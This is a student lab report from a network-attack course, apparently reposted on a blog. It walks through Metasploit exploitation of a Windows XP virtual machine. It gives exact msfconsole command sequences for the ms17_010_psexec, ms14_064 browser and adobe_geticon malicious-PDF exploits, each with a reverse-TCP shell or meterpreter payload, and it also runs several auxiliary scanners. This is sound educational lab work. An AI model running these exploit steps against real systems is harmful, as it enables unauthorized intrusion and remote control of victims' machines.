2018-2019 20165237网络对抗 Exp5 MSF基础应用


实验目标

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
  • 一个主动攻击实践,如ms08-067; (1分)

ms17_010_psexec(√) 不唯一

  • 一个针对浏览器的攻击,如ms11-050;(1分)

ms14_064_ole_lode_execution(√)不唯一

  • 一个针对客户端的攻击,如Adobe;(1分)

adobe_geticon(√) 唯一

  • 成功应用任何一个辅助模块。(0.5分)

scanner/http/ssl_version(√)不唯一

scanner/portscan/tcp (√)不唯一

scanner/oracle/tnslsnr_version (√)唯一

  • 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

Exp 5.1 一个主动攻击实践-ms17-010

  • 攻击机:Kali(IP地址:192.168.153.135)
  • 靶机: windows XP(IP地址:192.168.153.136)
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > show payloads
msf exploit(windows/smb/ms17_010_psexec) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.153.135 //攻击机ip
msf exploit(windows/smb/ms17_010_psexec) > set LPORT 5237 //攻击端口
msf exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.153.136 //靶机ip,特定漏洞端口已经固定
msf exploit(windows/smb/ms17_010_psexec) > run //攻击

  • 攻击成功如下:


Exp 5.2 对浏览器的攻击 ms14_064

  • 攻击机:Kali(IP地址:192.168.153.135)
  • 靶机: windows XP(IP地址:192.168.153.136)
msfconsole
msf > use windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp //http反向回连
set LHOST 192.168.153.135//攻击机ip
set Lport 5237//攻击端口固定
exploit //攻击
  • 可以看到生成的一个URL:http://192.168.153.135:8080/YT1IHT

  • 在XP的IE上点开后:

  • 回到Kali,查看sessions,输入sessions -i 4后,发现攻击成功,获得shell功能


Exp 5.3 针对Adobe Reader软件的渗透攻击-adobe-geticon

  • 攻击机:Kali(IP地址:192.168.153.135)
  • 靶机: windows XP(IP地址:192.168.153.136)

    -依次输入以下指令:
search Adobe
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.153.135
set LPORT 5237
set filename 20165237.pdf
exploit



  • 找到pdf文件(要打开显示隐藏文件选项)

  • 接着输入以下代码

back
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.153.135
set LPORT 5237
exploit
  • 接着在xp中点开pdf文件,回到kali,发现回传了一些东西。





  • 查看sessions,输入session -i 1,发现攻击成功,可以使用shell。


Exp 5.4 辅助功能攻击-tcp+ssl_version+tnslsnr_version

  • 攻击机:Kali(IP地址:192.168.153.135)

  • 靶机: windows XP(IP地址:192.168.153.136)

  • 输入search auxiliary

  • 选择其中一个进行使用(其实我试了很多,成功的也挺多,但是和之前的人重复,所以我就多用了几个,可能会重复,但是我觉得效果很好)

  • tcp扫描成功:



  • ssl版本模块扫描成功:



  • OracleSQL的监听服务攻击成功:


实验感想和问题

  • 用自己的话解释什么是exploit,payload,encode?

exploit:针对靶机的漏洞,利用靶机中的后门,对靶机进行攻击。

payload:可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。说白了就是传送到靶机上的用来攻击的恶意代码。

encode:对payload进行编码

  • 离实战还缺些什么技术或步骤?

    1、在实践中发现MSF攻击的局限性很大,其中的漏洞几乎都是针对win XP系统,而实际应用的系统大部分是win7及以上的系统,如果需要实战攻击win7及以上的系统,还需要不断发现并成功利用新的漏洞。

    2、需要提高扫描等信息收集技术,信息收集是做攻击的重要前提,但大多数初级的扫描都会被win7及以上的系统发现甚至拒绝,所以提供相应的技术很重要。

  • 感想:

这次实验花费了很多时间去查找能攻击成功的漏洞,但是让我对于msf更加熟练,甚至更加崇拜,希望以后能够使用它更多的领域。

2018-2019 20165237网络对抗 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  2. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  3. 2018-2019 20165220 网络对抗 Exp5 MSF基础

    实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

  4. 2018-2019 20165219 网络对抗 Exp5 MSF基础

    实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

  5. 20145338 《网络对抗》 MSF基础应用

    20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...

  6. 20145308 《网络对抗》 MSF基础应用 学习总结

    20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

  7. 20145326蔡馨熤《网络对抗》——MSF基础应用

    20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...

  8. 20155218《网络对抗》MSF基础应用

    20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...

  9. 20155304《网络对抗》MSF基础应用

    20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...

随机推荐

  1. 你注意到 .Net Framework 和 .Net Core 中使用 Session 的区别了吗?

    起因 在测试一个例子时发现的问题,这个示例实现的功能是刷新页面也能保持表格锁定列的状态,先看下页面的完成效果: 测试中发现,几乎相同的代码: 在 FineUIMvc(Net Framework)下没有 ...

  2. 【网站公告】请大家不要发表任何涉及“得到App”的内容

    大家好,今天我们收到来自杭州某某网络科技有限公司的维权骑士团队的邮件,说他们受某某(天津)文化传播有限公司委托,展开维权.园子里有些博主因为学习“得到App”的课程在博客中记了一些笔记,也被维权. 为 ...

  3. ValueError: too many values to unpack

    Error msg: 执行: python manage,py makemigrations 报错:Value: too many values to unpack 问题: django第一次数据库迁 ...

  4. node-portfinder

    nstallation   $ [sudo] npm install portfinder   Usage var portfinder = require('portfinder'); portfi ...

  5. 四十二、在线预览pdf文件

    //文档在线观看 checkWoc(type, id, taskId, smsId, stsId) { if(type == "zip" || type == "7z&q ...

  6. C语言之各个位数上的数值之和

    #include<stdio.h> #include<stdlib.h> void main() { int num; ; int x,y; printf("请输入一 ...

  7. 微信内分享第三方H5链接无法使用内置浏览器打开的解决方案

    很多朋友在微信内想分享转发H5链接的时候都会很容易碰到H5链接在微信内无法打开或在微信内无法打开app下载页的情况.通常这种情况微信会给个提示 “已停止访问该网址” ,那么导致这个情况的因素有哪些呢, ...

  8. 【转】Linux中的特殊权限粘滞位(sticky bit)详解

    Linux下的文件权限 在linux下每一个文件和目录都有自己的访问权限,访问权限确定了用户能否访问文件或者目录和怎样进行访问.最为我们熟知的一个文件或目录可能拥有三种权限,分别是读.写.和执行操作, ...

  9. Linux学习之路4——文件IO打开、创建、读写操作

    1.使用man 2 open.man 2 creat.man 2 write.man 2 read命令获取头文件 语法: int open(const char *pathname, int flag ...

  10. 【THUSC2017】【LOJ2979】换桌 线段树 网络流

    题目大意 有 \(n\) 个圆形的桌子排成一排,每个桌子有 \(m\) 个座位. 最开始每个位置上都有一个人.现在每个人都要重新选择一个座位,第 \(i\) 桌的第 \(j\) 个人的新座位只能在第 ...